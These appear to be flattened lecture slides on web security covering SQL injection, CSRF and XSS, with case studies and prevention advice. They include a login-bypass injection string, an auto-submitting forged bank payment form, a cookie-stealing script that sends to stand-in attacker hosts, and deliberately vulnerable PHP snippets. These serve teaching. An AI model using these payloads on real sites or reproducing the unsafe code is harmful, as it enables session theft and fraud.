Lecture 7 Web Application Security Sunday 10/4/2016
Agenda Web Site Vulnerabilities SQL Injection Cross Site Request Forgery (CSRF) Cross-site scripting (XSS)
Three Top Web Site Vulnerabilities SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query CSRF Cross-Site Request Forgery Bad web site sends browser request to good web site, using credentials of an innocent victim XSS Cross-Site Scripting Bad web site sends innocent victim a script that steals information from an honest web site
Three Top Web Site Vulnerabilities Attack Goals SQL Injection Uses SQL to change meaning of database command CSRF Cross-Site Request Forgery Leverage user s session at victim sever to perform actions XSS Cross-Site Scripting Inject malicious script into trusted context
SQL Injection Basic picture: Attacker s malicious code executed on victim server Victim Server 1 2 Attacker 3 receive valuable data unintended SQL query Victim SQL DB
SQL Injection Database queries with PHP Sample PHP $recipient = $_POST[ recipient ]; $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executequery($sql); Problem What if recipient is malicious string that changes the meaning of the query?
SQL Injection CardSystems Attack CardSystems credit card payment processing company SQL injection attack in June 2005 put out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed
SQL Injection Case Study set ok = execute( "SELECT * FROM Users WHERE user=' " & form( user ) & " ' AND pwd=' " & form( pwd ) & ' ); if not ok.eof login success else fail; Is this exploitable?
SQL Injection Web Browser (Client) Enter Username & Password Web Server SELECT * FROM Users WHERE user='me' AND pwd='1234' DB Normal Query
SQL Injection Suppose user = ' or 1=1 -- (URL encoded) Then scripts does: ok = execute( SELECT WHERE user= ' ' or 1=1 -- ) The -- causes rest of line to be ignored. Now ok.eof is always false and login succeeds. The bad news: easy login to many sites this way.
SQL Injection How to prevent SQL injection attacks Examples Parameterized statements parameterized statement, rather than embedding user input in the statement, can be used (excluding arguments) Pattern check and sanitize the input Float, integer, Boolean, string parameters can be checked if their value is valid representation for the given type Employing input validation technique for authenticating user input against a set of defined rules for type, length and syntax and also against other rules Database permissions
Cross Site Request Forgery Introduction when a user visits a target website
Cross Site Request Forgery (CSRF) what happens in a CSRF attack?
Q: how long do you stay logged in to Gmail? Facebook?. Cross Site Request Forgery Basic picture: Attacker site forges request from Server Victim victim browser to victim server 1 4 2 User Victim Attack Server
Cross Site Request Forgery Example: User logs in to bank.com Session cookie remains in browser state as the browser is still open User visits another website containing: <form name=f action=http://bank.com/billpay.php> <input name=recipient value=badguy> <script> document.f.submit(); </script> Browser sends user authentication cookie with request Transaction will be fulfilled Problem: cookie authentication is insufficient when side effects occur
Cross Site Request Forgery Example (Money transfer) Form post with cookie
Cross Site Request Forgery Cookieless Example: Home Router Home router 1 4 2 User 3 Bad web site
Cross Site Request Forgery How to prevent CSRF attacks and reduce their threats? Examples of effective solutions Single per-page nonce insert a nonce into each form and also into a special slot in the server session compare the values of these two variables when the form is submitted Per-session nonce To overcome the usability weaknesses of the per-page nonce single token is created at the beginning of the session and is used throughout the session
Cross Site Request Forgery For User Protection Log out CSRF attacks generally require that the victim be logged into the target website Do not save basic authentication credentials Change default passwords Use different browsers Most CSRF targets require the victim to have an active session on the website in order for the attack to work Use a virtual machine use dedicated browser virtual machines (VMs), configured with a minimal OS and a web browser. Enforcement via proxies enforce the use of different browsers for visiting different classes of sites by using proxy servers and configuring the proxy settings on their users browsers
Cross Site Scripting (XSS) Basic scenario: Attacker s malicious code executed on victim browser Attack Server 1 2 5 Victim client Victim Server
Cross Site Scripting (XSS) XSS example: vulnerable website search field on victim.com: http://victim.com/search.php? term = apple Server-side implementation of search.php: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> echo search term into response
Cross Site Scripting (XSS) Consider link: (properly URL encoded) http://victim.com/search.php? term = <script> window.open( http://badguy.com?cookie = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> 3. Browser executes script: Sends badguy.com cookie for victim.com
Cross Site Scripting (XSS) Attack Server www.attacker.com http://victim.com/search.php? term = <script>... </script> Victim client www.victim.com <html> Results for <script> window.open(http://attacker.com?... document.cookie...) </script> </html> Victim Server
Cross Site Scripting (XSS) What is XSS? An XSS vulnerability is present when an attacker can inject scripting code (e.g., Javascript) into pages generated by a web application Methods for injecting malicious code: Reflected XSS ( type 1 ) the attack script is reflected back to the user as part of a page from the victim site Stored XSS ( type 2 ) the attacker stores the malicious code in a resource managed by the web application, such as a database Others, such as DOM-based attacks ( type 0 XSS) malicious data are being reflected by the JavaScript code, fully on the victim client/user side
Cross Site Scripting (XSS) Basic scenario: reflected XSS attack Attack Server Email version 1 2 5 User Victim Server Victim
Cross Site Scripting (XSS) 2006 Example Vulnerability Attackers contacted users via email and fooled them into accessing a particular URL hosted on the legitimate PayPal website Injected code redirected PayPal visitors to a page warning users their accounts had been compromised Victims were then redirected to a phishing site and prompted to enter sensitive financial data
Cross Site Scripting (XSS) Stored XSS Attack Server 1 User Victim Inject malicious Store script bad stuff Download it Server Victim
Cross Site Scripting (XSS) Stored XSS using images Suppose pic.jpg on web server contains HTML! request for http://site.com/pic.jpg results in: HTTP/1.1 200 OK Content-Type: image/jpeg <html> fooled ya </html> The browser will render this as HTML (despite Content-Type) Consider photo sharing sites that support image uploads What if attacker uploads an image that is a script?
Cross Site Scripting (XSS) The best way to protect against XSS attacks Validates all headers, cookies, query strings, form fields, and hidden fields (i.e., all parameters) Do not attempt to identify active content (i.e., interactive website content)and remove, filter, or sanitize it There are too many types of active content and too many ways of encoding it to get around filters for such content. Adopt a positive security policy that specifies what is allowed. Negative or attack signature based policies are difficult to maintain and are likely to be incomplete
Complex problems in social network sites User data Usersupplied application - Some social networking sites allow users to build and upload their own applications - Applications are unrestricted JavaScript that runs on the users browser, then the JavaScript from an application could read user information, act as the user or do other malicious actions